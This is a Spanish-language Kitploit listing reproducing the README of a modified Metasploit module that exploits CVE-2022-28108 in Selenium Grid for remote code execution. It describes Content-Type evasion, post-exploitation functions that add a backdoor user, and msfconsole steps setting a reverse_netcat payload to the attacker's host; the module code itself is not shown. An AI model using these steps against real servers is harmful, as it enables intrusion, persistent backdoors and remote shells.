Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-28108 — Módulo de Metasploit que explota CVE-2022-28108 en Selenium Grid para ejecución remota de código, con evasión de tipo de contenido y capacidades de post-explotación. | Kitploit
Herramientas/GitHubGitHub/zeroethical/cve-2022-28108
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubzeroethical/cve-2022-28108

CVE-2022-28108

Módulo de Metasploit que explota CVE-2022-28108 en Selenium Grid para ejecución remota de código, con evasión de tipo de contenido y capacidades de post-explotación.

3hace 1 añoAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Selenium Chrome RCE Exploit (Extendido)

Este repositorio contiene una versión modificada de un módulo de Metasploit que explota una vulnerabilidad de Ejecución Remota de Código en versiones antiguas de Selenium Server (Grid).

Por favor, lea este README atentamente antes de usar este código.


Reconocimiento del código original:

Este módulo se basa en el excelente trabajo de los autores originales del módulo de Metasploit para CVE-2022-28108. La funcionalidad principal de explotación de la vulnerabilidad de Selenium Server sigue basándose en gran medida en su implementación. Reconocemos y agradecemos su contribución a la comunidad de seguridad.

  • Módulo original de Metasploit: Puede encontrar el módulo original dentro de Metasploit Framework.
  • Autores originales: Los autores originales se acreditan dentro del propio módulo (normalmente en la sección 'Author'). Consulte el módulo original para conocer sus nombres específicos.

Vulnerabilidad explotada:

Este módulo está dirigido a CVE-2022-28108, una vulnerabilidad de Falsificación de Solicitud entre Sitios (CSRF) en Selenium Server (Grid) en versiones anteriores a 4.0.0-alpha-7. Esta vulnerabilidad surge porque el servidor permite tipos de contenido que no son JSON (como text/plain, application/x-www-form-urlencoded y multipart/form-data) para ciertas solicitudes. Un atacante puede aprovechar esto para enviar solicitudes maliciosas, lo que conduce a la Ejecución Remota de Código (RCE) en el servidor.

Cómo funciona el código original:

El módulo original de Metasploit explota esta vulnerabilidad enviando una solicitud POST manipulada al endpoint /wd/hub/session del servidor Selenium vulnerable. Esta solicitud utiliza un Content-Type que no es JSON (específicamente text/plain) e incluye configuraciones maliciosas dentro de goog:chromeOptions de las capacidades del navegador deseadas. Esto permite a un atacante especificar un binario arbitrario (como /usr/bin/python3) y argumentos para ejecutar en el servidor cuando se inicia una nueva sesión de navegador.

Modificaciones y mejoras en esta versión:

Este repositorio contiene una versión modificada del módulo original de Metasploit. Las modificaciones principales incluyen:

  • Evasión de Content-Type: El módulo modificado intenta explotar la vulnerabilidad enviando la solicitud maliciosa con múltiples cabeceras Content-Type diferentes. Esto incluye text/plain, application/x-www-form-urlencoded y multipart/form-data. Esto se hace para potencialmente evadir mecanismos básicos de filtrado o detección que podrían estar buscando un Content-Type específico.
  • Función execute_post_exploitation: Se ha añadido una nueva función execute_post_exploitation(session_response). Esta función se llama después de una explotación exitosa y tiene como objetivo realizar tareas básicas de post-explotación. En la implementación actual, incluye:
    • Intentar añadir un usuario de puerta trasera (backdoor) al sistema.
    • Recopilar información básica del sistema (nombre de usuario, ID, versión del kernel).
  • Función execute_command_on_target: Se ha añadido otra nueva función execute_command_on_target(command). Esta función permite la ejecución de comandos arbitrarios en el sistema objetivo después de una explotación exitosa. Se utiliza dentro de la función execute_post_exploitation y puede extenderse para actividades posteriores de post-explotación.

Diferencias clave destacadas:

La diferencia principal reside en el método exploit y en la adición de las dos nuevas funciones.

  • Método exploit original: Centrado en enviar una única solicitud con Content-Type: text/plain.
  • Método exploit modificado: Itera a través de diferentes valores de Content-Type, intentando la explotación con cada uno. Tras una explotación exitosa, llama a la función execute_post_exploitation.
  • Funciones nuevas: Las funciones execute_post_exploitation y execute_command_on_target son adiciones completamente nuevas de esta versión modificada, que proporcionan capacidades ampliadas de post-explotación.

Cómo usar el módulo modificado:

  1. Asegúrese de tener Metasploit Framework instalado.
  2. Guarde el código modificado: Guarde el código Ruby proporcionado como un archivo .rb (por ejemplo, selenium_rce_extended.rb).
  3. Coloque el módulo en el directorio de módulos de Metasploit: Copie el archivo guardado al directorio de módulos de Metasploit correspondiente. Normalmente se encuentra en /usr/share/metasploit-framework/modules/exploits/ o ~/.msf4/modules/exploits/. Consulte su instalación de Metasploit para conocer la ubicación exacta.
  4. Inicie la consola de Metasploit: Abra una terminal y ejecute msfconsole.
  5. Cargue el módulo: En la consola de Metasploit, use el comando use exploit/selenium_rce_extended (o la ruta donde guardó el archivo si lo colocó en un subdirectorio).
  6. Configure el objetivo: Establezca la dirección IP y el puerto del servidor Selenium vulnerable:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
    msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
    
    (El puerto predeterminado de Selenium Grid suele ser 4444).
  7. Establezca el payload: Elija un payload para ejecutar en el sistema objetivo. Por ejemplo, para obtener una reverse shell:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
    msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
    msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
    
  8. Ejecute el exploit: Ejecute el módulo con el comando exploit.

Consideraciones importantes (Descargo de responsabilidad):

  • Use este código de forma responsable y ética. Este módulo se proporciona con fines educativos y para que los profesionales de la seguridad prueben y evalúen la seguridad de sus sistemas.
  • Asegúrese de tener permiso explícito para probar contra el sistema objetivo. El uso no autorizado de este código es ilegal y poco ético.
  • Comprenda los riesgos implicados. Explotar vulnerabilidades puede tener consecuencias no deseadas y puede desestabilizar los sistemas objetivo.
  • Pruebe en entornos aislados y controlados. Realice siempre las pruebas en entornos donde tenga control total y pueda mitigar cualquier daño potencial.
  • Las funciones de post-explotación son ejemplos básicos. Puede que necesite modificarlas o ampliarlas según sus necesidades específicas y el entorno objetivo.

Descargo de responsabilidad:

Los autores de este código modificado no son responsables de ningún uso indebido o daño causado por el uso de este módulo. Al usar este código, usted acepta asumir toda la responsabilidad por sus acciones.

Licencia:

Este código modificado probablemente esté cubierto por la misma licencia que la del Metasploit Framework original (normalmente la Licencia MSF). Consulte la licencia del Metasploit Framework original para obtener más detalles.

Contribuciones:

Las contribuciones y mejoras a este módulo son bienvenidas. No dude en enviar pull requests con correcciones de errores, mejoras o nuevas funcionalidades.

Agradecimientos:

Reiteramos nuestro agradecimiento a los autores originales del módulo de Metasploit para CVE-2022-28108. Su trabajo constituye la base de este módulo modificado.

Descargar herramienta